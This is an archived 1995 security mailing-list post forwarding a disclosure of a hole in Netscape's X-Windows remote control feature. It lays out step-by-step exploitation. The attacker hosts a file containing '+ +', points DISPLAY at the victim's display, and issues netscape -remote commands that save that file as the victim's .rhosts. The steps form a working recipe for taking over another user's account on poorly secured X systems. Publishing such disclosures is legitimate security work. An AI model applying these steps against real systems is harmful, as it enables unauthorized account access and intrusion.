[prev in list] [next in list] [prev in thread] [next in thread] 

List:       best-of-security
Subject:    BoS: netscape/X remote control exploit
From:       Julian Assange <proff () suburbia ! net>
Date:       1995-10-01 6:31:19
[Download RAW message or body]

SOURCE: comp.security.unix
RE: Netscape remote control mechanism for X based clients.

* There's a huge hole in the Netscape remote control mechanism for the
* X-Windows based clients.
* Potential impact : anybody can become any user that uses Netscape on any
* system without sufficient X security.

* Let's suppose that you have an account on a target machine, where somebody
* is using Netscape, and either the xhost checking is disabled, or you can
* set the xhost yourself (e.g. if you have an account and the target user has
* no .Xauthority, as is frequent in university computer rooms).
* Then you can gain access to the target user's account using the following
* steps :

* - make a text file containing only "+ +" accessible (as file, as URL, or
*   whatever you like) to the target Netscape client. This is quite easy, either
*   if you have a personal WWW page (http://... URL) or an account on the
*   target machine (file://... URL), or even by uploading it to an anon FTP

* - set your DISPLAY environment variable to the target display

* - run the following set of commands :

*   netscape -noraise -remote "openURL(<put-your-URL-here>)"
*   netscape -noraise -remote "saveAs(.rhosts)"
*   netscape -noraise -remote back

* In the second command, the path should be specified whenever possible
* (~ is not accepted).

* If the target user does not already have a .rhosts and is not looking at that
* precise moment, then the chances are it worked !

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic